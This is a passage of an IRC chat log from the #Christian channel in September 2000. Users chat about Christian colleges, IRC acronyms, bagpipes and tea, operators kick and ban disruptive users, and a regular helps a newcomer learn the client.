restricts it to rhe ama students[00:13] <rts> forgive me, but "Christian College" s ounds like "military intelligence" to me :)[00:13] <Colin^> Hi ya Kozubchik[00:13] -> *dan-* back now?[00:13] <gen|c0de> lol rts[00:13] <HotPink> well[00:13] <gen|c0de> it is[00:14] <HotPink> i fully intend on[00:14] <HotPink> going to[00:14] <HotPink> a christian college[00:14] *** laura7 ([email protected]) has jo ined #christian[00:14] <Vote4Bush> which one[00:14] <Dovi-dude> rts, nah,, thats how georgetown , yale, etc started as, remeber? 
:)[00:14] <HotPink> trinity christian college[00:14] * Vote4Bush is going to a Christian college next fall[00:14] *** Disconnected[00:14] * Raid is away since 00:14:31 - 09/09/2000 ( Auto-Away: Not here ) - Msgs will be saved.[00:14] *** Attempting to rejoin...[00:14] * Raid has returned ( Auto-Away: Not here ) - on 00:14:34 @ 09/09/2000 - Away 0 minutes.#Christian Cannot send to channel[00:14] *** Rejoined channel #christian[00:14] *** Topic is 'Encourage each other daily. ( Hebrews 3:13)'[00:14] *** Set by Beukeboom on Fri Sep 08 03:42:55[00:14] -logos3- http://www.forchrist.net - channel website, for rules and other info.[00:14] <Vote4Bush> i will probably go to johnson b ible college in knoxville TN[00:14] <Colin^> wb Raid[00:14] <Raid> sigh[00:14] <Raid> Vote4Bush: It's an interesting place .[00:14] <HotPink> don't go to milligan[00:15] <gen|c0de> HotPink: youd be better off goin g to a regular college, most of the people ive encounterd at those colleges are far fro m what youd call a christian[00:15] *** Colin^ sets mode: -b *!Hell@*.sympatico .ca[00:15] <Vote4Bush> lol im not going to milligan[00:15] <gen|c0de> they get their all hot for jesus[00:15] *** ironic^^ ([email protected]) Quit (Pin g timeout for ironic^^[203.170.14.152])

[00:15] <HotPink> gen-well good for them
[00:15] <Vote4Bush> friend going there though
[00:15] <HotPink> they should get a cookie
[00:15] <HotPink> but i'm not them
[00:15] <Vote4Bush> raid you know johnson? or just knoxville?
[00:15] <gen|c0de> within a year they fall off the train per se
[00:15] <HotPink> milligan is so full of crap
[00:15] <Raid> Vote4Bush: both. hehe
[00:15] <HotPink> like half of the kids there smoke and drink
[00:15] <Raid> Vote4Bush: I went to johnson for a service contract; I'm one of the techs that fixes their stuff.
[00:15] <Colin^> HotPink watch the language please
[00:15] * HotPink watches
[00:15] <HotPink> yep
[00:16] <HotPink> there it is
[00:16] <gen|c0de> crap?
[00:16] <HotPink> heh
[00:16] <Vote4Bush> oh, alright. you probably met my uncle, he is dealing with most of that
[00:16] <gen|c0de> whats wrong with that?
[00:16] *** ironic^^ ([email protected]) has joined #Christian
[00:16] <HotPink> yeah
[00:16] *** satiaKat ([email protected].net) has joined #Christian
[00:16] <HotPink> i'm baffled too
[00:16] <HotPink> anyway
[00:16] <Vote4Bush> how is it full.... hotpink?
[00:16] <gen|c0de> how come you didnt say anything to me for using the lords name in vein??
[00:16] <HotPink> because they claim be strict
[00:16] <HotPink> and all for god and not allowing that stuff
[00:16] <HotPink> heh
[00:16] <gen|c0de> thats more of a 'crime' then saying crap
[00:17] <HotPink> and they just act like it doesn't happen
[00:17] *** Colin^ sets mode: +b *!*generic@*.quik.com
[00:17] *** gen|c0de was kicked by Colin^ (This random kick message was censored by popular request)
[00:17] <Vote4Bush> um
[00:17] <HotPink> your such a hypocrite
[00:17] <Vote4Bush> did he just like... ask to be kicked?
[00:17] <HotPink> that was so stuppid
[00:17] *** Kozubchik ([email protected]) Quit (†[C-Script]† - www.C-Script.com and irc.C-Script.com)
[00:17] *** Colin^ sets mode: +b *!piglet@*.mvn.net
[00:17] *** HotPink was kicked by Colin^ (I'm only doing this because I care)
[00:17] <thumps> ;)
[00:17] *** laura7 ([email protected]) Quit (Leaving)
[00:17] <Vote4Bush> arg
[00:17] *** satiaKat ([email protected].net) Quit (GOD IS AWSOME!!!..............ALL THE TIME!!!!)
[00:18] <Vote4Bush> whassup thumps
[00:18] <thumps> Vote4Bush: not much
[00:19] <YinsMom> see ya later thumps....bye room
[00:19] *** YinsMom ([email protected].EDU) has left #Christian
[00:19] * PaganJoy hugs thumps till her has a Victorian cinched waistline
[00:19] <PaganJoy> her = he
[00:20] <thumps> hahah pags
[00:20] <Maverick> Scary.
[00:20] *** newzeal ([email protected].co.nz) has left #Christian
[00:20] <Dovi-dude> night room, peace
[00:20] *** Dovi-dude ([email protected].net) has left #Christian
[00:21] * thumps hugs pags till she ............sez yes
[00:21] <PaganJoy> ooh la la
[00:21] <Lanfear`> to what?
[00:21] <thumps> ;)
[00:21] <Vote4Bush> heh

[00:22] *** Re[D]eemd ([email protected]e.com) Quit (Mental floss with God's Word daily to prevent truth decay!)
[00:22] * Colin^ could do with a nice cup of tea
[00:23] <Raid> Hmmm
[00:23] <Raid> Thats actually a cute quit msg
[00:23] * Vote4Bush boils some water for tea
[00:24] <rts> except the idea of flossing one's brain doesn't sound so appealing
[00:24] <rts> you'd probably.. damage something, I'm sure
[00:24] <Vote4Bush> lol
[00:25] <rts> "Ow, my frontal lobe... *drool*"
[00:25] * Pipetobak reaches into the breast pocket of his flannel shirt and extracts a well worn, and well appreciated briar pipe. Meticulously he fills the pipe with delightful crumbles of leaf and gripping the stem of the pipe with his teeth, he strikes a match. The creamy, dense, vanilla tinted smoke is rich and delightful and he inhales it deeply with relish as he glances about looking for interesting conversation.
[00:26] <Raid> hmmm
[00:26] <Colin^> thumps can send you a home lobotomy kit to try rts
[00:26] <Raid> I have migraines alot as it is, I think that would make it worse.
[00:26] <Maverick> Pipetobak: I'm sure those auto-scripts of yours get longer every time I see then.
[00:26] <Raid> shrug.
[00:27] * thumps reaches for his sharp fork
[00:27] <Raid> Maverick: He does it to annoy you. ;p Everytime you complain, it grows by 2 lines. <G>
[00:27] <Maverick> LOL
[00:27] <Maverick> Really Raid?
[00:27] <Raid> no hehe
[00:27] <rts> Colin^: cool
[00:27] <Raid> but it sounded good didn't it? ;)
[00:27] *** fitzfield ([email protected]) has joined #Christian
[00:27] <rts> 'cause you know, I just have way too much brain
[00:27] <Colin^> Pipetobak changes them often
[00:28] *** ramdac ([email protected].da.uu.net) has joined #Christian
[00:28] <Colin^> yesterday was one liner and I almost fainted
[00:28] <Lanfear`> one liner?
[00:28] *** Adar_Caan ([email protected].home.com) Quit (NewYork-R.NY.US.Undernet.Org SantaClara.CA.US.Undernet.Org)
[00:28] *** Jubei ([email protected]) Quit (NewYork-R.NY.US.Undernet.Org SantaClara.CA.US.Undernet.Org)
[00:29] <Lanfear`> oh..
[00:29] <Lanfear`> never mind
[00:29] * Vote4Bush blows everyone a kiss goodnight
[00:29] *** Vote4Bush ([email protected]est.net) Quit (Friends don't let friends vote democrat.)
[00:29] *** Adar_Caan ([email protected].home.com) has joined #Christian
[00:29] <Pipetobak> Yes I do, Colin. To keep it interesting for all.
[00:29] <Maverick> I can believe that.
[00:29] <Maverick> The day he floods the channel for it Colin^, you should kick him;-)
[00:29] *** Jubei ([email protected]) has joined #Christian
[00:29] *** Jubei ([email protected]) Quit (Leaving)
[00:30] *** Jubei1 ([email protected]) has joined #Christian
[00:30] <thumps> and break the silence or idle chat?
[00:30] <rts> shh
[00:30] <Jubei1> I say we idle chat
[00:31] *** just_gal ([email protected]) Quit (#kingcoles #samarnon #kingcoles #samarnon #kingcoles #samarnon #kingcoles #samarnon #kingcoles #samarnon #kingcoles #samarnon #kingcoles #samarnon #kingcoles #s)
[00:31] <Pipetobak> Why should I be kicked? I never flood the channel.
[00:32] <Pipetobak> I merely send an image of me so you may better visualize me as you speak to me.
[00:32] <Colin^> :o)
[00:33] * Maverick checks out more Matrix sites.
[00:33] *** Colin^ sets mode: -b *!*@supernal.godsey.net

[00:33] *** maiang ([email protected]) has joined #Christian
[00:33] *** fitzfield ([email protected]) Quit (Ping timeout for fitzfield[202.78.95.104])
[00:33] <Maverick> Boy.
[00:33] <Maverick> Its gone kinda quiet.
[00:33] <Maverick> Am I lagged?
[00:33] <Maverick> Or has everyone decided I am not worth listening to?
[00:33] * Maverick decides about this.
[00:33] *** LadyViv ([email protected].net.au) has joined #Christian
[00:33] *** logos3 sets mode: +b *!*@*.one.net.au
[00:33] <Colin^> is chatting in message
[00:33] *** LadyViv was kicked by logos3 (banned: ISP banned: Continued illegal activity by one user)
[00:33] *** Colin^ sets mode: -o Colin^
[00:34] <Maverick> I canna find my glasses.
[00:35] <Colin^> Mine are on my nose
[00:35] *** ironic^^ ([email protected]) Quit (SoMEdAy, SomHoW, FaR bEyOuNd 2 DaY i WiLl FiNd ThE wAy 2 FiNd U bUt SoMeHoW tHrU tHe LoNlYnIghT i Will LiVe ThE In ThE dArK tHaT U r n2 My HeArt LoVe U .(.KATE))
[00:35] * rts is away: not here
[00:35] *** rts ([email protected]ome.com) has left #Christian
[00:35] *** Pipetobak ([email protected]ager.net) Quit (Leaving)
[00:36] <Maverick> Oh my goodness I was lagged.
[00:36] *** Pipetobak ([email protected]ager.net) has joined #Christian
[00:36] <thumps> wb pipe :)
[00:37] <Maverick> Oh my goodness I was lagged.
[00:37] *** sansan` ([email protected]da.psi.net) has joined #Christian
[00:37] <Maverick> Why didn't anyone tell me?
[00:37] <Maverick> huh?
[00:37] <Maverick> :P
[00:38] <Maverick> =)
[00:38] *** FuNNy ([email protected]) has joined #Christian
[00:38] *** fitzfield ([email protected]) has joined #Christian
[00:39] *** eagles` ([email protected].uu.net) has joined #Christian
[00:39] <FuNNy> hi..
[00:39] <Colin^> hey eagles
[00:39] <eagles`> hey Colin^... just sent you an icq lol
[00:40] *** Dawn ([email protected]) has joined #Christian
[00:40] <FuNNy> colin??
[00:40] *** fitzfield ([email protected]) Quit (Broken pipe)
[00:40] <Dawn> hi, i'm new to this site
[00:41] <eagles`> hello Dawn... nice to meet you
[00:41] *** [Mo]- ([email protected]) has joined #Christian
[00:41] <Dawn> nice to meet you to eagles
[00:42] <FuNNy> hi dawn
[00:42] <Dawn> hi FuNNy
[00:42] <eagles`> you a Canadian, me an Ozzie Welsman, lol, who speaks a little French :)
[00:42] <FuNNy> hi
[00:42] <Dawn> I am actually new to the whole IRC experience
[00:43] <Raid> Dawn: Welcome.
[00:43] <FuNNy> how r u dawn?
[00:43] <eagles`> you are still welcome, happens to all of us at some stage :)
[00:43] <Lanfear`> well.. I have to get up REALLY early
[00:43] <Lanfear`> sigh sigh
[00:43] <[Mo]-> i speak french
[00:43] <Dawn> i am fine and how are you
[00:43] <Lanfear`> on a saturday no less.. chat ya'll later
[00:43] * Colin^ speaks french
[00:43] *** Lanfear` ([email protected]et) Quit (Leaving)
[00:43] <Raid> sigh, bye lan.
[00:43] <eagles`> enchante [pleased to meet you], [Mo]-
[00:43] <[Mo]-> hehe
[00:43] <[Mo]-> who can really speak french here?
[00:44] <eagles`> un petit peu, mais ne pas dans ce channel [a little bit, but not in this channel]

[00:44] <Dawn> I only understand French when I hear it
[00:44] *** thumps ([email protected].home.com) has left #Christian
[00:44] <FuNNy> great
[00:44] <eagles`> on parles Anglais ici :) [we speak English here :)]
[00:44] *** charisma ([email protected]) Quit (Why do people cry when they hear the word goodbye!!!!)
[00:44] <Maverick> hey eagles`
[00:44] <Colin^> Je parle francais mon ami [I speak French, my friend]
[00:44] <maiang> hi egales
[00:44] <maiang> hi eagles
[00:44] <Jubei1> I'm a redneck commie saskatchewan hick :)
[00:44] <eagles`> yo Maverick :)
[00:44] <Jubei1> I don't speak french... but I can say "I loose" in ancient Greek :)
[00:44] <eagles`> kewl <g>
[00:44] <Jubei1> I just started learning the language last week :)
[00:44] <eagles`> hehe
[00:45] <[Mo]-> a oui, hé bien c'est vraiment amusant a savoir Colin^ [ah yes, well that's really amusing to know, Colin^]
[00:45] <eagles`> this is why I come on to IRC, to chat and have a fun time
[00:45] <Jubei1> Colin, I understood. Mo, you lost me :)
[00:45] *** `Ash` ([email protected]) has joined #Christian
[00:45] <Colin^> brb
[00:45] <[Mo]-> :P
[00:45] *** Colin^ ([email protected]) has left #Christian
[00:45] <Raid> Dawn: Just so you know, IRC is very addicting. :)
[00:45] *** Colin^ ([email protected]) has joined #Christian
[00:45] <maiang> bye
[00:45] * eagles` remembers starting to learn german in school and the first words were vulgar when said in English
[00:45] <Dawn> that i have heard and i can see why
[00:45] <eagles`> I eat.... and father
[00:46] *** X sets mode: +o Colin^
[00:46] <eagles`> oh dear dont kick me!!!!!!!!!!!
[00:46] *** Colin^ sets mode: -b *!*[email protected].*
[00:46] *** Colin^ sets mode: +b *!*@202.77.100.*
[00:46] *** FuNNy was kicked by Colin^ (P.S. This doesn't mean we can't be friends)
[00:46] <Dawn> can someone tell me what brb and :p means
[00:46] <`Ash`> be right back
[00:46] <Colin^> be right back
[00:46] <Dawn> i know what lol means
[00:46] <[Mo]-> k
[00:46] <Colin^> :p is someone poking their tounge out
[00:47] *** maiang ([email protected]) Quit (Yesterday is History...Tomorrow is Mystery..Today is a Gift..thats why its called " present "...Live it !!!)
[00:47] <eagles`> brb is an acronym... be right back
[00:47] <Dawn> thank you
[00:47] <eagles`> asl often asked by filipinos, is age sex location
[00:47] <eagles`> ctc is care to chat
[00:47] <Dawn> oh lovely
[00:47] <Jubei1> :) is something that is overused
[00:47] <eagles`> rofl is rolling on the floor laughing
[00:48] <eagles`> quite something to do in real life :))
[00:48] <eagles`> oh and rl is real life
[00:48] <[Mo]-> lol
[00:48] <Colin^> :oÞ
[00:49] <eagles`> Dawn you are using mIRC like I am... they have a very good series of helps on their website and in their help files
[00:49] <[Mo]-> and std is something to do
[00:49] <eagles`> heh didnt know that!
[00:49] <[Mo]-> lol
[00:49] <Dawn> i should check out the help files, and i thank you for all your help
[00:50] <eagles`> meant to add that much of the acronyms are in those help files
[00:50] *** Colin^ sets mode: -bbb *!piglet@*.mvn.net *!*generic@*.quik.com *!*DIE@*.rcn.com
[00:50] *** Colin^ sets mode: -o Colin^

[00:50] <Dawn> great to know
[00:50] <Raid> Dawn: and you can learn just by being in chat... it's fun.
[00:50] *** `Ash` ([email protected]) has left #Christian
[00:50] <eagles`> sure is
[00:51] <Dawn> i watched a bit here and there to get the jist of it.
[00:51] *** Icon ([email protected]) has joined #Christian
[00:51] <eagles`> sometimes its boring, sometimes infuriating, but mostly it's great... and as Raid said, can become addictive very easily
[00:51] <Maverick> Oh no.
[00:51] *** gen|c0de ([email protected]m) has joined #Christian
[00:52] <Colin^> wb gen|c0de
[00:52] <gen|c0de> crap.
[00:52] <Dawn> i know i need to be careful, often i am not doing to much so this could become a habit that may not be to good
[00:52] <gen|c0de> i was sitting there playing with identd
[00:52] <gen|c0de> and i went hrm
[00:52] <gen|c0de> dude its only a nick ban
[00:52] <gen|c0de> regardless
[00:52] *** Icon ([email protected]) has left #Christian
[00:52] <Colin^> gen|c0de I removed the ban
[00:52] <eagles`> Dawn you need to be careful to whom you give personal details because cyber stalking is a very real problem
[00:53] <gen|c0de> no you didnt
[00:53] <Colin^> Yes I did kid
[00:53] <gen|c0de> unless you di it just like 5 seconds ago
[00:53] <gen|c0de> hi raid
[00:53] <Colin^> I did
[00:53] <gen|c0de> :)
[00:53] *** Icon ([email protected]) has joined #Christian
[00:53] <Raid> gen|c0de: heh, hello ;p
[00:53] <Dawn> i understand that, I knew someone who got into trouble
[00:53] *** generic ([email protected]m) has joined #Christian
[00:53] <Colin^> ** Colin^ sets mode: -bbb *!piglet@*.mvn.net *!*generic@*.quik.com *!*DIE@*.rcn.com
[00:53] <Colin^> (eagles`): meant to add that much of the acronyms are in those help files
[00:53] *** Icon ([email protected]) Quit (Read error to Icon[idxwc07-08.idx.com.au]: EOF from client)
[00:53] <eagles`> gen|c0de I wonder why you are arguing?you are in here... therefore no ban... as I see it
[00:53] <Colin^> gen|c0de see it?
[00:53] <gen|c0de> ah well you just did it a few minutes ago
[00:54] <generic> this is me too
[00:54] <eagles`> so what buddy? grrrrrrrr
[00:54] <Colin^> Make one of them go generic
[00:54] <Dawn> how does one get banned?
[00:54] <gen|c0de> regardless, learn how to do bans correctly
[00:54] <gen|c0de> better yet
[00:54] <eagles`> very easily lol
[00:54] *** X sets mode: +o Colin^
[00:54] <eagles`> here it comes
[00:54] *** gen|c0de ([email protected]m) has left #Christian
[00:54] <eagles`> lol
[00:54] <Dawn> lol
[00:54] <Colin^> Thanks
[00:54] *** generic ([email protected]m) has left #Christian
[00:55] *** generic ([email protected]m) has joined #Christian
[00:55] <eagles`> hmmm my script didnt pick up the clone
[00:55] *** FlyGuy_38 ([email protected]el.ca) has joined #Christian
[00:55] *** BassPlaye ([email protected].net) has joined #Christian
[00:55] <Colin^> Hey BassPlaye
[00:55] <generic> hey i just realized my part message didnt come through
[00:55] <BassPlaye> hi
[00:55] <eagles`> hey the canuks are coming in fast

[00:55] <Colin^> Hello FlyGuy_38
[00:55] <eagles`> hi BassPlaye
[00:55] <generic> you can go fuck yourtself cause i didnt want to be here anyways
[00:55] *** generic ([email protected]m) has left #Christian
[00:55] <FlyGuy_38> hi
[00:56] *** X sets mode: +o eagles`
[00:56] <eagles`> i have word kick enabled
[00:56] <Dawn> now now watch your language:)
[00:56] *** rts ([email protected]ome.com) has joined #Christian
[00:56] <Colin^> Hi rts
[00:56] <rts> yo
[00:56] <eagles`> hey rts
[00:56] *** Colin^ sets mode: -o Colin^
[00:57] <rts> greetings
[00:57] <eagles`> duh didnt mean to push you off the pole Colin^
[00:57] <Colin^> eagles` tis ok, I wanted to read a newsgroup
[00:57] *** weird ([email protected].net) has joined #Christian
[00:58] <weird> oh oh i am there
[00:58] *** JAA98 ([email protected]) has joined #Christian
[00:58] <eagles`> Dawn you were asking about banning... we are pretty tolerant here excepyt with those who come in deliberately to make trouble
[00:58] <weird> apologies peoples
[00:59] <Dawn> i see, this is good:)
[00:59] <PaganJoy> hi Dawn
[00:59] <Dawn> Hi
[01:00] <weird> i am not weird
[01:00] <Dawn> i'm sure you're not
[01:00] <Jubei1> Your name is misleading then :)
[01:00] <Raid> Dawn: Just play it cool and bans aren't something you'll have to worry about.
[01:00] <Jubei1> Myself, I'm completely mad
[01:00] <weird> its a mistaken story too long to tell
[01:00] <eagles`> we have a three-strikes-and-you-are-out policy generally speaking, a "kick" to remove ppl, and finally on the third offence a ban which runs for 24 hours typically
[01:01] *** Philip15 ([email protected]) has joined #Christian
[01:01] <Jubei1> I play in large vats of jelly
[01:01] <Jubei1> I scream at the top of my lungs
[01:01] <weird> how do you mark?
[01:01] <Jubei1> I live to laugh and be jolly
[01:01] *** Philip15 ([email protected]) Quit (don't love me from what u intend or hope that I would be, and if ur only using me to feed ur fantasy, you're not really in love, so let me go, I must be free!!!)
[01:01] <eagles`> Jubei1 sounds a sticky sort of situation to me :)
[01:01] <Jubei1> and I stuff my face with fresh baked buns
[01:01] <Jubei1> (I mean that in a totally non-sexual way)
[01:02] *** Disconnected
[01:02] * Raid is away since 01:02:26 - 09/09/2000 ( Auto-Away: Not here ) - Msgs will be saved.
[01:02] *** Attempting to rejoin...
#CHristian Cannot send to channel
[01:02] * Raid has returned ( Auto-Away: Not here ) - on 01:02:29 @ 09/09/2000 - Away 0 minutes.
[01:02] *** Rejoined channel #christian
[01:02] *** Topic is 'Encourage each other daily. ( Hebrews 3:13)'
[01:02] *** Set by Beukeboom on Fri Sep 08 03:42:57
[01:02] -logos3- http://www.forchrist.net - channel website, for rules and other info.
[01:02] <Jubei1> Once I was a philosophy major :)
[01:02] <PaganJoy> wb Raid!
[01:02] <Raid> My isp has got to get that fixed.
[01:02] <Jubei1> Once when my sanity was still intact
[01:02] <weird> well no i don't know....
[01:03] <Jubei1> But then... oh poor fortune that is me... it cracked... it cracked...
[01:03] <eagles`> hey the pagster didnt see you !!!!!!!!!!!!!!!!!!!!!!!!
[01:03] * Jubei1 brays laughing uncontrollably

[01:03] <PaganJoy> eagles!! hiya!!!!!!!! :)
[01:03] <eagles`> like a cuppa tea?
[01:03] <PaganJoy> Jubei-- go "The Nanny"'s laugh down pat? ;)
[01:03] <weird> yeah i would ta:)
[01:03] <PaganJoy> mmm tea!!
[01:04] <eagles`> Dawn there's also sounds linked to irc... does your computer have a sound card?
[01:04] <Jubei1> Pagan> If it was... then I would be deranged, not merely mad
[01:04] <weird> green preferable
[01:04] *** sWeAtPeA ([email protected]) has joined #CHristian
[01:04] <Jubei1> But I am mad you see, and I'm also nutty
[01:04] <eagles`> if someone plays a sound your mirc can find, yours then plays the same one
[01:04] * PaganJoy nods solemnly
[01:04] <Jubei1> Which explains why women seem to like me with ice cream and other sweet things
[01:04] * eagles` likes nutty.old navy expression for chocolate
[01:04] <weird> yeah yeah i dont do wavs:)
[01:04] <Dawn> i do not believe so. I am also new to the full extent of the computer world
[01:05] <eagles`> thats fine:)
[01:05] <eagles`> you know the diff between :) and :( ??
[01:05] <Jubei1> Whenever they see me they start shaking the cans, or scooping the tubs
[01:05] <Dawn> yes
[01:05] <Jubei1> They cover me, and then eat me all up
[01:05] <Jubei1> Cause I'm nutty
[01:05] * Jubei1 strolls around with a monacle and tophat
[01:06] <Jubei1> See... completely nutty... *twirls his cane*
[01:06] *** ^jer-bear ([email protected]) has joined #CHristian
[01:06] <Dawn> i don't like being :( only :)
[01:06] <weird> who are you asking this eagle?:):(
[01:06] <eagles`> talking to Dawn who is new to IRC
[01:06] <weird> oh
[01:06] <weird> ok
[01:07] <Jubei1> But I think I'm going to retire from being insane
[01:07] <Jubei1> It is too much effort, too little pay
[01:07] <eagles`> also Dawn in mirc you can use the TAB key to save typing a person's nickname... time saver... did you know that? It's called "nick complete"
[01:07] <Jubei1> I'll miss those pretty blue things they give you to swallow at that nice place with men in white suits
[01:07] <Jubei1> But I think I am ready to move on
[01:07] <weird> huh
[01:07] * eagles` holds the door open
[01:08] <Jubei1> (Valium pills at the nuthouse) ;)
[01:08] <weird> nice
[01:08] *** CodePoet ([email protected]m) has joined #CHristian
[01:08] <weird> like nice
[01:08] *** Ixithmm (~hello@HSE-Montreal-ppp103152.sympatico.ca) Quit (Leaving)
[01:08] <Jubei1> I wish I had MIRC, but instead I have a java applet
[01:08] <Jubei1> Oops, accidently hit bold
[01:08] <Dawn> I have heard of that, I'm just winging this ya know:)
[01:08] <CodePoet> mIRC sucks
[01:08] <CodePoet> :P
[01:08] <weird> not a lot:)
[01:09] <Jubei1> Well, to bed with I
[01:09] <Jubei1> Goodnight all
[01:09] *** Jubei1 ([email protected]) Quit (Leaving)
[01:09] <eagles`> bye Jubeil
[01:09] *** TacoMan ([email protected].net) has joined #CHristian
[01:10] <Maverick> Oh dear.
[01:10] <eagles`> oh?
[01:10] * eagles` wonders why isnt in her channel 2
[01:10] <weird> now you guys i have a question?
[01:10] * eagles` changes nick to dumbo - all ears
[01:11] <weird> IF

[01:11] <weird> if i want to join philosophy
[01:11] *** FlyGuy_38 ([email protected]el.ca) has left #CHristian
[01:11] <weird> and IF
[01:12] <weird> if they think i am weird
[01:12] *** Pipetobak ([email protected]ager.net) Quit (Ping timeout for Pipetobak[as4-dial22.flnt.mi.voyager.net])
[01:13] <weird> how come its ok for me to be in christian?
[01:13] <Colin^> weird yes
[01:13] <eagles`> missed the drift of the question, sorry
[01:13] *** charisma ([email protected]) has joined #CHristian
[01:13] <weird> the drift was obscure... true
[01:13] *** Kenshin^^ ([email protected]) has joined #CHristian
[01:13] <Colin^> weird no one can se you in #christian from another channel anyway, its set on secret
[01:14] <eagles`> see up the top it says channel modes are +stn
[01:14] <weird> not the point Colin^
[01:14] *** ^_John_^ ([email protected]) has joined #CHristian
[01:14] <eagles`> secret, topics set by ops, no notices in
[01:14] *** cierra ([email protected]) has joined #CHristian
[01:14] <weird> oh ok what does that that mean?
[01:14] *** charisma ([email protected]) has left #CHristian
[01:14] <eagles`> secret means you dont show up on someone's /whois or on /names
[01:15] <weird> oh
[01:15] <Dawn> now i don't understand this secret stuff
[01:15] *** [Mo]- ([email protected]) has left #CHristian (CaLiNe DE BoNnEs BiNnEs [a Quebecois mild expletive, roughly "darn it"])
[01:15] <eagles`> unless they are in the same secret channel
[01:15] <cierra> hi pags
[01:15] <Colin^> weird so is the point " we think you are weird to be here ??
[01:15] <cierra> :)
[01:15] <eagles`> it is a protection, Dawn
[01:15] *** ^_John_^ is now known as ^John^
[01:15] <PaganJoy> hi cierra :)
[01:15] <cierra> :)
[01:15] <Colin^> HI ^John^
[01:15] <Colin^> hello cierra
[01:15] <cierra> hi colin
[01:15] <weird> well i am but do you think so
[01:15] <^John^> Hi ppl
[01:15] <eagles`> yes, weird
[01:15] <logos3> yes, wierd
[01:15] <weird> oh oh i am assuming my nick
[01:16] <Colin^> weird yes
[01:16] <eagles`> snap
[01:16] <weird> good one....
[01:16] *** ^jer-bear ([email protected]) Quit (Leaving)
[01:16] <weird> i luv it!
[01:16] *** jamie^16 ([email protected]) has joined #CHristian
[01:16] <eagles`> brb, afk a moment ( Dawn that means away from keyboard)
[01:16] *** Kenshin^^ ([email protected]) Quit ((VirusScript 2øøø) GeT iT aT http://www.v2000.cjb.net/ and http://www.yasarozg.net/)
[01:18] <weird> Scotish water is soft
[01:18] <weird> t
[01:18] <Colin^> weird its the Peat
[01:18] <weird> aaaah
[01:18] <weird> like carbonated?
[01:19] <Colin^> THats why they make such good Scotch
[01:19] <weird> the glens
[01:19] <Colin^> The water is filtered by the Peat
[01:19] <weird> aaaaah
[01:19] <weird> well it is true
[01:19] <weird> hair needs no conditioning
[01:20] <PaganJoy> niters all

[01:20] * PaganJoy waves :)
[01:20] *** PaganJoy ([email protected].mindspring.com) Quit (Umm.. where am I going, and what's with this handbasket??)
[01:21] *** BassPlaye ([email protected].net) Quit (Ping timeout for BassPlaye[cras58p137.navix.net])
[01:22] *** twile ([email protected]) has joined #CHristian
[01:22] <weird> so subteranean water is not a secret
[01:22] <weird> i just went there for the first time last month
[01:22] *** bu2zard ([email protected]) has joined #CHristian
[01:22] <Colin^> weird to the Highlands?
[01:22] <eagles`> Dawn there's another one, bbiab be back in a bit
[01:22] <weird> yes
[01:22] *** Maverick ([email protected]dise.net.nz) Quit (Ping timeout for Maverick[203-79-93-232.tnt11.paradise.net.nz])
[01:23] <Dawn> thanks
[01:23] <weird> tho they liked me:)
[01:23] *** bu2zard ([email protected]) Quit (Leaving)
[01:23] *** sWeAtPeA ([email protected]) has left #CHristian (havoc.(r)oots.(r)adical)
[01:23] <weird> thing i liked also was highland bands.....
[01:24] <weird> like there was this dutch highland band
[01:24] <weird> in kilts
[01:24] *** danimal ([email protected]sprint.net) has joined #CHristian
[01:25] <weird> nice tooo
[01:25] <weird> i like a look of the kilt
[01:25] <weird> but
[01:25] * rts is away: not here
[01:25] <weird> dutch?
[01:25] *** rts ([email protected]ome.com) has left #CHristian
[01:25] <Dawn> eagles` thanx for all the info and your time out to let me know what things mean
[01:25] <eagles`> we have highland bands here in Austrlai too - on the plains, lol
[01:26] <eagles`> thats fine, look forward to seeing you again :)
[01:26] <eagles`> take care, God bless you
[01:26] <Colin^> Irish play the bagpipes as well
[01:26] <weird> and pipes
[01:26] <Dawn> Thanx and God Bless:)
[01:26] <weird> and harps
[01:26] <eagles`> yeah, they gave the Scots them as a present, and the Sciots havent seen the joke yet,lol
[01:27] *** Dawn ([email protected]) has left #CHristian
[01:27] <weird> eagles that wasnt funny:(
[01:27] <eagles`> lol
[01:27] * eagles` actually loves pipe bands
[01:27] <weird> so oh ok goodie:)
[01:27] <eagles`> <g>
[01:28] <Colin^> I like Pipebands as well, I can still sing Scotland the brave
[01:28] <eagles`> the first time I ever heard Amazing Grace it was played by a pipe band
[01:28] * weird just sings psalms
[01:28] <weird> well psalters
[01:28] <Colin^> eagles` Paul mccartney did a bagpipe version, remember that?
[01:28] <eagles`> that would be about 1968
[01:28] <weird> but is not weird
[01:29] *** Bond-007 ([email protected]) has joined #CHristian
[01:29] <eagles`> no, I don't. I remember a single released while I was working at the TV station at Bunbury
[01:29] <Colin^> Hi Bond-007
[01:29] <weird> mull of kintire
[01:29] <Bond-007> Wooo!! GO GOLDEN BEARS!
[01:29] <Colin^> weird yep
[01:29] <eagles`> thats beautiful too
[01:29] <weird> yeah.....soooo gooood
[01:29] <Colin^> Bond-007 Gummy bears?

[01:29] <Bond-007> Just went to my high school's football game. We kicked the crud out of the other team :)
[01:29] <Bond-007> No! Golden Bears!! :)
[01:29] <cierra> woo hoo
[01:29] <cierra> bond
[01:30] *** tree` ([email protected]m) has joined #CHristian
[01:30] <weird> i play mull of kintire on the pianee
[01:30] <weird> ten fingers
[01:30] * Colin^ prefers Gummy Bears
[01:30] * Bond-007 plays Nirvana in honor of the TV HS Bears
[01:30] <Bond-007> hehe Colin
[01:31] <weird> mix and match
[01:31] * eagles` forgets what he came on line to do
[01:31] <eagles`> grrrrrr
[01:31] <weird> so (bite me)
[01:32] * weird asks what Christian means?
[01:32] <Bond-007> It feels so nice to sit in this chair compared to the metal benches
[01:32] <Bond-007> Someone who follows Jesus Christ's teachings is the technical term
[01:32] *** Maverick ([email protected]ise.net.nz) has joined #CHristian
[01:32] <twile> !seen ricky77
[01:32] <Colin^> Hi Maverick
[01:33] <danimal> !seen danimal
[01:33] <weird> i like this room
[01:33] <eagles`> weird it is an expression first used at Antioch on the Palestinian coast around 70AD meaning those who follow Christ... initially a term of derision some folk will tell you
[01:33] <Maverick> Hi=)
[01:33] <Colin^> danimal was last on IRC channel #christian 8 minutes ago.]
[01:34] <eagles`> #Christian is a channel run by a number of Christians who are happy for anyone to come in and chat as long as they dont try and me nasty
[01:34] <danimal> thanks colin
[01:34] <weird> b
[01:34] <eagles`> yeah typo
[01:34] <weird> yeah :)
[01:35] <weird> i have a dog called Solomon
[01:35] <weird> same deal
[01:35] * Colin^ has a Cat called MrJordan Big Eyes
[01:35] *** cierra ([email protected]) has left #CHristian
[01:35] <eagles`> how is MrJordonBigEyes?
[01:35] -> *cierra* I think I know you from a long time ago?
